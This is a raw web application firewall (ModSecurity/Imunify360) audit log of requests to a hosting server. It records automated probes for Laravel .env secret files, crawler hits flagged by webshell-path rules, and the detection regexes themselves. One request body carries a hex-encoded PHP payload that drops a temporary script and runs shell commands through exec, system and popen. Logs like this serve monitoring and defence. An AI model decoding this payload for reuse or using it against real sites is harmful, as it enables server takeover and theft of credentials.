--3e13bb32-B-- GET /aaina/images/rajasthan-tours-from-udaipur/images/https/https/js/aainag/our-services.php HTTP/1.1 x-openai-host-hash: 800249317 accept: */* from: gptbot(at)openai.com user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot) accept-encoding: gzip, br, deflate host: abhaytravelsindia.digitaltheka.com --3e13bb32-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.1.18 Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --3e13bb32-H-- Message: Pattern match "(\\/(images|img(s)?|pictures|upload(s)?)\\/[^\\.]{0,108}\\.(pht|phtml|php\\d?$))" at REQUEST_URI. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "20"] [id "77140735"] [msg "IM360 WAF: Suspicious access attempt (webshell)||MVN:REQUEST_URI||MV:/aaina/images/rajasthan-tours-from-udaipur/images/https/https/js/aainag/our-services.php||SC:||WPU:||RSV:7.05||RS:0||T:APACHE||"] [severity "NOTICE"] [tag "service_im360"] [tag "noshow"] -- Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --68a34032-Z-- --580e3451-A-- [30/Jun/2025:16:33:23.917214 +0530] aGJu-yr_VjbCfxeXLc8cDwAAAE8 192.253.209.75 54627 192.168.74.40 443 --580e3451-B-- GET /fedex/.env HTTP/1.1 Host: 103.185.74.40 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36 Accept-Encoding: * Accept: */* Connection: keep-alive --580e3451-F-- HTTP/1.1 500 Internal Server Error X-Powered-By: PHP/7.4.33 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=utf-8 --580e3451-H-- Message: Access denied with code 403 (phase 2). [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "227"] [id "77316757"] [msg "IM360 WAF: Laravel .env file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "CRITICAL"] [tag "service_im360"] Action: Intercepted (phase 2) Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751281403867423 50182 (- - -) Stopwatch2: 1751281403867423 50182; combined=1009, p1=114, p2=711, p3=0, p4=0, p5=184, sr=63, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --580e3451-Z-- --7edd727b-A-- [30/Jun/2025:16:33:25.604693 +0530] aGJu_YsgL1eZWVHBbmiYJwAAABg 192.253.209.54 7465 192.168.74.40 443 --7edd727b-B-- POST /fedex/.env HTTP/1.1 Host: 103.185.74.40 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:106.0) Gecko/20100101 Firefox/106.0 Accept-Encoding: * Accept: */* Connection: keep-alive Content-Length: 13 Content-Type: application/x-www-form-urlencoded --7edd727b-C-- 0x%5B%5D=DTAB --7edd727b-F-- HTTP/1.1 500 Internal Server Error X-Powered-By: PHP/7.4.33 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=utf-8 --7edd727b-H-- Message: Access denied with code 403 (phase 2). [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "227"] [id "77316757"] [msg "IM360 WAF: Laravel .env file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "CRITICAL"] [tag "service_im360"] Action: Intercepted (phase 2) Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751281405548027 60971 (- - -) Stopwatch2: 1751281405548027 60971; combined=2458, p1=167, p2=1777, p3=0, p4=0, p5=513, sr=72, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --7edd727b-Z-- --892b3d0d-A-- [30/Jun/2025:16:33:26.223863 +0530] aGJu_p4tZwI9VhjyFFR7fgAAAEI 20.171.207.232 33346 192.168.74.40 443 --892b3d0d-B-- GET /aaina/images/rajasthan-tours-from-udaipur/images/https/https/aainag/images/testimonials/our-services.php HTTP/1.1 x-openai-host-hash: 800249317 accept: */* from: gptbot(at)openai.com user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot) accept-encoding: gzip, br, deflate host: abhaytravelsindia.digitaltheka.com --892b3d0d-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.1.18 Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --892b3d0d-H-- Message: Pattern match "(\\/(images|img(s)?|pictures|upload(s)?)\\/[^\\.]{0,108}\\.(pht|phtml|php\\d?$))" at REQUEST_URI. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "20"] [id "77140735"] [msg "IM360 WAF: Suspicious access attempt (webshell)||MVN:REQUEST_URI||MV:/aaina/images/rajasthan-tours-from-udaipur/images/https/https/aainag/images/testimonials/our-services.php||SC:||WPU:||RSV:7.05||RS:0||T:APACHE||"] [severity "NOTICE"] [tag "service_im360"] [tag "noshow"] -- Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --8f22b87b-Z-- --d49b8730-A-- [30/Jun/2025:16:33:27.899497 +0530] aGJu_xcq64WljHnUEmPYAwAAABQ 192.253.209.55 31065 192.168.74.40 443 --d49b8730-B-- GET /__tests__/test-become/.env HTTP/1.1 Host: 103.185.74.40 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36 Accept-Encoding: * Accept: */* Connection: keep-alive --d49b8730-F-- HTTP/1.1 500 Internal Server Error X-Powered-By: PHP/7.4.33 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=utf-8 --d49b8730-H-- Message: Access denied with code 403 (phase 2). [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "227"] [id "77316757"] [msg "IM360 WAF: Laravel .env file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "CRITICAL"] [tag "service_im360"] Action: Intercepted (phase 2) Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751281407845940 53754 (- - -) Stopwatch2: 1751281407845940 53754; combined=1086, p1=122, p2=756, p3=0, p4=0, p5=208, sr=63, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --d49b8730-Z-- --6dfb0d7d-A-- [30/Jun/2025:16:33:28.545351 +0530] aGJvAJ4tZwI9VhjyFFR7gAAAAEI 20.171.207.232 33346 192.168.74.40 443 --6dfb0d7d-B-- GET /aaina/images/rajasthan-tours-from-udaipur/images/https/https/images/aainag/festivals-calendar.php HTTP/1.1 x-openai-host-hash: 800249317 accept: */* from: gptbot(at)openai.com user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot) accept-encoding: gzip, br, deflate host: abhaytravelsindia.digitaltheka.com --6dfb0d7d-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.1.18 Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --6dfb0d7d-H-- Message: Pattern match "(\\/(images|img(s)?|pictures|upload(s)?)\\/[^\\.]{0,108}\\.(pht|phtml|php\\d?$))" at REQUEST_URI. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "20"] [id "77140735"] [msg "IM360 WAF: Suspicious access attempt (webshell)||MVN:REQUEST_URI||MV:/aaina/images/rajasthan-tours-from-udaipur/images/https/https/images/aainag/festivals-calendar.php||SC:||WPU:||RSV:7.05||RS:0||T:APACHE||"] [severity "NOTICE"] [tag "service_im360"] [tag "noshow"] Message: Pattern match "(\\/(images|img(s)?|pictures|upload(s)?)\\/[^\\.]{0,108}\\.(pht|phtml|php\\d?$))" at REQUEST_URI. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/014_i360_infectors.conf"] [line "50"] [id "77140878"] [msg "IM360 WAF: Infectors: Suspicious access attempt (webshell)!||MVN:REQUEST_URI||WPU:||RSV:7.05||RS:0||T:APACHE||MV:/aaina/images/rajasthan-tours-from-udaipur/images/https/https/images/aainag/festivals-calendar.php||SC:/home/digitaltheka/public_html/abhaytravelsindia/aaina/images||"] [severity "DEBUG"] [tag "service_im360"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751281408527966 17844 (- - -) Stopwatch2: 1751281408527966 17844; combined=4020, p1=169, p2=3673, p3=0, p4=0, p5=178, sr=72, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --6dfb0d7d-Z-- --60708a24-A-- [30/Jun/2025:16:33:29.428001 +0530] aGJvAUVAU9RF2CQHMHStOQAAAB8 192.253.209.69 40189 192.168.74.40 443 --60708a24-B-- POST /__tests__/test-become/.env HTTP/1.1 Host: 103.185.74.40 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36 Accept-Encoding: * Accept: */* Connection: keep-alive Content-Length: 13 Content-Type: application/x-www-form-urlencoded --60708a24-C-- 0x%5B%5D=DTAB --60708a24-F-- HTTP/1.1 500 Internal Server Error X-Powered-By: PHP/7.4.33 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=utf-8 --60708a24-H-- Message: Access denied with code 403 (phase 2). [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "227"] [id "77316757"] [msg "IM360 WAF: Laravel .env file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "CRITICAL"] [tag "service_im360"] Action: Intercepted (phase 2) Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751281409334625 94094 (- - -) Stopwatch2: 1751281409334625 94094; combined=1645, p1=177, p2=1042, p3=0, p4=0, p5=425, sr=55, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --60708a24-Z-- --09252029-A-- [30/Jun/2025:16:33:29.739637 +0530] aGJvAZ4tZwI9VhjyFFR7gQAAAEI 20.171.207.232 33346 192.168.74.40 443 --09252029-B-- GET /aaina/images/rajasthan-tours-from-udaipur/images/https/https/images/aainag/testimonials/our-services.php HTTP/1.1 x-openai-host-hash: 800249317 accept: */* from: gptbot(at)openai.com user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot) accept-encoding: gzip, br, deflate host: abhaytravelsindia.digitaltheka.com --09252029-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.1.18 Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --09252029-H-- Message: Pattern match "(\\/(images|img(s)?|pictures|upload(s)?)\\/[^\\.]{0,108}\\.(pht|phtml|php\\d?$))" at REQUEST_URI. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "20"] [id "77140735"] [msg "IM360 WAF: Suspicious access attempt (webshell)||MVN:REQUEST_URI||MV:/aaina/images/rajasthan-tours-from-udaipur/images/https/https/images/aainag/testimonials/our-services.php||SC:||WPU:||RSV:7.05||RS:0||T:APACHE||"] [severity "NOTICE"] [tag "service_im360"] [tag "noshow"] -- Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --09252029-Z-- --ebe3d27c-A-- [30/Jun/2025:16:33:30.861489 +0530] aGJvAir1CSM-0VW7K7_L8QAAADk 192.253.209.84 10461 192.168.74.40 443 --ebe3d27c-B-- GET /local/.env HTTP/1.1 Host: 103.185.74.40 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36 Accept-Encoding: * Accept: */* Connection: keep-alive --ebe3d27c-F-- HTTP/1.1 500 Internal Server Error X-Powered-By: PHP/7.4.33 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=utf-8 --ebe3d27c-H-- Message: Access denied with code 403 (phase 2). [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "227"] [id "77316757"] [msg "IM360 WAF: Laravel .env file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "CRITICAL"] [tag "service_im360"] Action: Intercepted (phase 2) Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751281410817168 44819 (- - -) Stopwatch2: 1751281410817168 44819; combined=816, p1=97, p2=541, p3=0, p4=0, p5=177, sr=54, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --ebe3d27c-Z-- --2e6b1d54-A-- [30/Jun/2025:16:33:30.898417 +0530] aGJvAp4tZwI9VhjyFFR7ggAAAEI 20.171.207.232 33346 192.168.74.40 443 --2e6b1d54-B-- GET /aaina/images/rajasthan-tours-from-udaipur/images/https/https/images/aainag/testimonials/luxury.php HTTP/1.1 x-openai-host-hash: 800249317 accept: */* from: gptbot(at)openai.com user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot) accept-encoding: gzip, br, deflate host: abhaytravelsindia.digitaltheka.com --2e6b1d54-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.1.18 Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --2e6b1d54-H-- Message: Pattern match "(\\/(images|img(s)?|pictures|upload(s)?)\\/[^\\.]{0,108}\\.(pht|phtml|php\\d?$))" at REQUEST_URI. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "20"] [id "77140735"] [msg "IM360 WAF: Suspicious access attempt (webshell)||MVN:REQUEST_URI||MV:/aaina/images/rajasthan-tours-from-udaipur/images/https/https/images/aainag/testimonials/luxury.php||SC:||WPU:||RSV:7.05||RS:0||T:APACHE||"] [severity "NOTICE"] [tag "service_im360"] [tag "noshow"] Message: Pattern match "(\\/(images|img(s)?|pictures|upload(s)?)\\/[^\\.]{0,108}\\.(pht|phtml|php\\d?$))" at REQUEST_URI. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/014_i360_infectors.conf"] [line "50"] [id "77140878"] [msg "IM360 WAF: Infectors: Suspicious access attempt (webshell)!||MVN:REQUEST_URI||WPU:||RSV:7.05||RS:0||T:APACHE||MV:/aaina/images/rajasthan-tours-from-udaipur/images/https/https/images/aainag/testimonials/luxury.php||SC:/home/digitaltheka/public_html/abhaytravelsindia/aaina/images||"] [severity "DEBUG"] [tag "service_im360"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751281410881428 17438 (- - -) Stopwatch2: 1751281410881428 17438; combined=4066, p1=131, p2=3675, p3=0, p4=0, p5=259, sr=57, sw=1, l=0, gc=0 -- Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --5b815a77-Z-- --0969ce07-A-- [30/Jun/2025:16:33:32.265182 +0530] aGJvBLhjfRvDaLf6SuFSiwAAACQ 192.253.209.100 59757 192.168.74.40 443 --0969ce07-B-- POST /local/.env HTTP/1.1 Host: 103.185.74.40 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36 Accept-Encoding: * Accept: */* Connection: keep-alive Content-Length: 13 Content-Type: application/x-www-form-urlencoded --0969ce07-C-- 0x%5B%5D=DTAB --0969ce07-F-- HTTP/1.1 500 Internal Server Error X-Powered-By: PHP/7.4.33 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=utf-8 --0969ce07-H-- Message: Access denied with code 403 (phase 2). [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "227"] [id "77316757"] [msg "IM360 WAF: Laravel .env file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "CRITICAL"] [tag "service_im360"] Action: Intercepted (phase 2) Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751281412209564 55809 (- - -) Stopwatch2: 1751281412209564 55809; combined=2302, p1=184, p2=1854, p3=0, p4=0, p5=264, sr=120, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --0969ce07-Z-- --b22e8461-A-- [30/Jun/2025:16:33:33.231356 +0530] aGJvBZ4tZwI9VhjyFFR7hAAAAEI 20.171.207.232 33346 192.168.74.40 443 --b22e8461-B-- GET /aaina/images/rajasthan-tours-from-udaipur/images/https/https/aainag/images/festivals-calendar.php HTTP/1.1 x-openai-host-hash: 800249317 accept: */* from: gptbot(at)openai.com user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot) accept-encoding: gzip, br, deflate host: abhaytravelsindia.digitaltheka.com --b22e8461-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.1.18 Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --b22e8461-H-- Message: Pattern match "(\\/(images|img(s)?|pictures|upload(s)?)\\/[^\\.]{0,108}\\.(pht|phtml|php\\d?$))" at REQUEST_URI. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "20"] [id "77140735"] [msg "IM360 WAF: Suspicious access attempt (webshell)||MVN:REQUEST_URI||MV:/aaina/images/rajasthan-tours-from-udaipur/images/https/https/aainag/images/festivals-calendar.php||SC:||WPU:||RSV:7.05||RS:0||T:APACHE||"] [severity "NOTICE"] [tag "service_im360"] [tag "noshow"] -- Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --b22e8461-Z-- --1975d726-A-- [30/Jun/2025:16:33:33.353246 +0530] aGJvBafzaFMtHKwfAoXHEAAAAGI 192.253.209.102 20449 192.168.74.40 443 --1975d726-B-- GET /rest/.env HTTP/1.1 Host: 103.185.74.40 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36 Accept-Encoding: * Accept: */* Connection: keep-alive --1975d726-F-- HTTP/1.1 500 Internal Server Error X-Powered-By: PHP/7.4.33 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=utf-8 --1975d726-H-- Message: Access denied with code 403 (phase 2). [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "227"] [id "77316757"] [msg "IM360 WAF: Laravel .env file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "CRITICAL"] [tag "service_im360"] Action: Intercepted (phase 2) Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751281413300250 53468 (- - -) Stopwatch2: 1751281413300250 53468; combined=982, p1=95, p2=694, p3=0, p4=0, p5=192, sr=58, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --1975d726-Z-- --9b1bbc3f-A-- [30/Jun/2025:16:33:34.602512 +0530] aGJt2gnPgTBgKHWF5Rm7CgAAACc 167.99.229.202 35834 192.168.74.40 443 --9b1bbc3f-B-- POST /wp-content/plugins/elementor/core/common/modules/connect/apps/base.app.php HTTP/1.1 Host: lovedale.us sec-ch-ua: "Google Chrome";v="119", "Chromium";v="119", "Not?A_Brand";v="24" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "macOS" Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Accept: */* Sec-Fetch-Site: none Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Accept-Encoding: gzip,deflate Accept-Language: eo;q=0.8,en-US;q=0.6,en;q=0.4 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Content-Length: 3600 Content-Type: application/x-www-form-urlencoded --9b1bbc3f-C-- secure_access=706870202d72202724646972733d61727261795f66696c746572285b7379735f6765745f74656d705f64697228292c222f746d70222c222f7661722f746d70222c696e695f676574282275706c6f61645f746d705f64697222292c676574656e76282254454d5022292c676574656e762822544d5022292c67657463776428295d293b24633d72617775726c6465636f6465282225334325334670687025323025323025323072756e2532382532322f686f6d652f6c6f766564616c652f7075626c69635f68746d6c2f77702d636f6e74656e742f706c7567696e732f656c656d656e746f722f6173736574732f6c69622f666f6e742d617765736f6d652f6c6173745f31305f6e6577732532302533452532302f6465762f6e756c6c253230322533452532363125323225323925334225323066756e6374696f6e25323072756e253238253234696e2532392532302537422532302532302532302532302532302532346f7574253230253344253230253237253237253342253230253230253230253230253230696625323025323866756e6374696f6e5f6578697374732532382532376578656325323725323925323925323025374225323025323025323025323025323025323025323025323025323025343065786563253238253234696e2532432532302532346f75742532392533422532302532302532302532302532302532302532302532302532302532346f75742532302533442532302534306a6f696e2532382532322535436e2532322532432532302532346f7574253239253342253230253230253230253230253230253744253230656c7365696625323025323866756e6374696f6e5f65786973747325323825323770617373746872752532372532392532392532302537422532302532302532302532302532302532302532302532302532306f625f73746172742532382532392533422532302532302532302532302532302532302532302532302532302534307061737374687275253238253234696e2532392533422532302532302532302532302532302532302532302532302532302532346f75742532302533442532306f625f6765745f636c65616e253238253239253342253230253230253230253230253230253744253230656c7365696625323025323866756e6374696f6e5f65786973747325323825323773797374656d2532372532392532392532302537422532302532302532302532302532302532302532302532302532306f625f737461727425323825323925334225323025323025323025323025323025323025323025323025323025343073797374656d253238253234696e2532392533422532302532302532302532302532302532302532302532302532302532346f75742532302533442532306f625f6765745f636c65616e253238253239253342253230253230253230253230253230253744253230656c7365696625323025323866756e6374696f6e5f6578697374732532382532377368656c6c5f657865632532372532392532392532302537422532302532302532302532302532302532302532302532302532302532346f75742532302533442532302534307368656c6c5f65786563253238253234696e253239253342253230253230253230253230253230253744253230656c7365696625323025323869735f7265736f7572636525323825323466253230253344253230253430706f70656e253238253234696e253243253230253232722532322532392532392532392532302537422532302532302532302532302532302532302532302532302532302532346f75742532302533442532302532322532322533422532302532302532302532302532302532302532302532302532307768696c6525323025323825323125343066656f66253238253234662532392532392532302537422532302532302532302532302532302532302532302532302532302532302532302532302532302532346f75742532302e2533442532306672656164253238253234662532432532303130323425323925334225323025323025323025323025323025323025323025323025323025374425323025323025323025323025323025323025323025323025323070636c6f73652532382532346625323925334225323025323025323025323025323025374425323025323025323025323025323072657475726e2532302532346f757425334225323025374425323022293b666f7265616368282464697273206173202464297b69662869735f6469722824642926262069735f7772697461626c6528246429297b24703d227b24647d2f2e636f6e74656e74223b69662866696c655f7075745f636f6e74656e74732824702c246329297b696e636c7564652024703b40756e6c696e6b282470293b657869743b7d7d7d6469652822216e6f74777274626c2122293b27 -- Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --9b1bbc3f-Z-- --3b5b5d76-A-- [30/Jun/2025:16:33:34.803353 +0530] aGJvBmCECAzpimnDb-m5OAAAABc 192.253.209.89 41557 192.168.74.40 443 --3b5b5d76-B-- POST /rest/.env HTTP/1.1 Host: 103.185.74.40 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:105.0) Gecko/20100101 Firefox/105.0 Accept-Encoding: * Accept: */* Connection: keep-alive Content-Length: 13 Content-Type: application/x-www-form-urlencoded --3b5b5d76-C-- 0x%5B%5D=DTAB --3b5b5d76-F-- HTTP/1.1 500 Internal Server Error X-Powered-By: PHP/7.4.33 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=utf-8 --3b5b5d76-H-- Message: Access denied with code 403 (phase 2). [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "227"] [id "77316757"] [msg "IM360 WAF: Laravel .env file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "CRITICAL"] [tag "service_im360"] Action: Intercepted (phase 2) Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751281414723876 81906 (- - -) Stopwatch2: 1751281414723876 81906; combined=2247, p1=168, p2=1633, p3=0, p4=0, p5=445, sr=53, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --3b5b5d76-Z-- --21033506-A-- [30/Jun/2025:16:33:35.618989 +0530] aGJvB54tZwI9VhjyFFR7hgAAAEI 20.171.207.232 33346 192.168.74.40 443 --21033506-B-- GET /aaina/images/rajasthan-tours-from-udaipur/images/https/https/js/js/js/luxury-mini-buses-coaches.php HTTP/1.1 x-openai-host-hash: 800249317 accept: */* from: gptbot(at)openai.com user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot) accept-encoding: gzip, br, deflate host: abhaytravelsindia.digitaltheka.com --21033506-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.1.18 Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --21033506-H-- Message: Pattern match "(\\/(images|img(s)?|pictures|upload(s)?)\\/[^\\.]{0,108}\\.(pht|phtml|php\\d?$))" at REQUEST_URI. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "20"] [id "77140735"] [msg "IM360 WAF: Suspicious access attempt (webshell)||MVN:REQUEST_URI||MV:/aaina/images/rajasthan-tours-from-udaipur/images/https/https/js/js/js/luxury-mini-buses-coaches.php||SC:||WPU:||RSV:7.05||RS:0||T:APACHE||"] [severity "NOTICE"] [tag "service_im360"] [tag "noshow"] -- Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --d1af0104-Z-- --4090117f-A-- [30/Jun/2025:16:33:39.777861 +0530] aGJvCyCWOMSsVhQe6kdOigAAACA 192.253.209.91 6007 192.168.74.40 443 --4090117f-B-- GET /sources/.env HTTP/1.1 Host: 103.185.74.40 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36 Accept-Encoding: * Accept: */* Connection: keep-alive --4090117f-F-- HTTP/1.1 500 Internal Server Error X-Powered-By: PHP/7.4.33 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=utf-8 --4090117f-H-- Message: Access denied with code 403 (phase 2). [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "227"] [id "77316757"] [msg "IM360 WAF: Laravel .env file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "CRITICAL"] [tag "service_im360"] Action: Intercepted (phase 2) Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751281419722369 55765 (- - -) Stopwatch2: 1751281419722369 55765; combined=914, p1=133, p2=559, p3=0, p4=0, p5=222, sr=94, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --4090117f-Z-- --05edea2b-A-- [30/Jun/2025:16:33:40.206699 +0530] aGJvDJ4tZwI9VhjyFFR7igAAAEI 20.171.207.232 33346 192.168.74.40 443 --05edea2b-B-- GET /aaina/images/rajasthan-tours-from-udaipur/images/https/https/aainag/js/js/luxury-mini-buses-coaches.php HTTP/1.1 x-openai-host-hash: 800249317 accept: */* from: gptbot(at)openai.com user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot) accept-encoding: gzip, br, deflate host: abhaytravelsindia.digitaltheka.com --05edea2b-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.1.18 Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --05edea2b-H-- Message: Pattern match 